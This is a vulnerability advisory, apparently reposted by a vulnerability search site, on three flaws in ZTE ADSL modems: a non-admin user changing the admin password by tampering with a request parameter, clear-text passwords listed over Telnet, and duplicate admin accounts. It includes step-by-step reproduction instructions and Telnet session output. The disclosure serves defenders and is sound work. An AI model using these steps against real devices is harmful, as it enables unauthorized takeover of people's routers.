Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2015-7257 CVE-2015-7258 CVE-2015-7259

Publish Date: 14 Nov 2015

Source

                							

                *ZTE ADSL modems - Multiple vulnerabilities*

Confirmed on 2 (of multiple) software versions - *W300V2.1.0f_ER7_PE_O57
and W300V2.1.0h_ER7_PE_O57*

1 *Insufficient authorization controls*

*CVE-ID*: CVE-2015-7257

Observed in Password Change functionality. Other functions may be
vulnerable as well.

*Expected behavior:*

Only administrative 'admin' user should be able to change password for all
the device users. 'support' is a diagnostic user with restricted
privileges. It can change only its own password.

*Vulnerability:*

Any non-admin user can change 'admin' password.


*Steps to reproduce:*

a. Login as user 'support' password XXX

b. Access Password Change page - http://&lt;IP&gt;/password.htm

c. Submit request

d. Intercept and Tamper the parameter  username  change from 'support' to
'admin'

e. Enter the new password &gt; old password is not requested &gt; Submit

&gt; Login as admin

-&gt; Pwn!



2 *Sensitive information disclosure - clear-text passwords*

Displaying user information over Telnet connection, shows all valid users
and their passwords in clear-text.

*CVE-ID*: CVE-2015-7258

*Steps to reproduce:*

$ telnet &lt;IP&gt;

Trying &lt;IP&gt;...

Connected to &lt;IP&gt;.

Escape character is '^]'.

User Access Verification

Username: admin

Password: &lt; admin/XXX1

$sh

ADSL#login show                 &lt;-- shows user information

Username Password Priority

admin        password1 2

support      password2 0

admin         password3 1



3 *(Potential) Backdoor account feature - **insecure account management*

Same login account can exist on the device, multiple times, each with
different priority#. It is possible to log in to device with either of the
username/password combination.

*CVE-ID*: CVE-2015-7259

It is considered as a (redundant) login support *feature*.


*Steps to reproduce:*

$ telnet &lt;IP&gt;

Trying &lt;IP&gt;...

Connected to &lt;IP&gt;.

Escape character is '^]'.

User Access Verification

User Access Verification

Username: admin

Password: &lt;-- admin/password3

$sh

ADSL#login show

Username  Password  Priority

admin  password1  2

support  password2  0

admin  password3  1

+++++

Best Regards,

Karn Ganeshen
-- 
Best Regards,
Karn Ganeshen


<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

ZTE ADSL Authorization Bypass / Information Disclosure

Vulmon Search

About

Products

Connect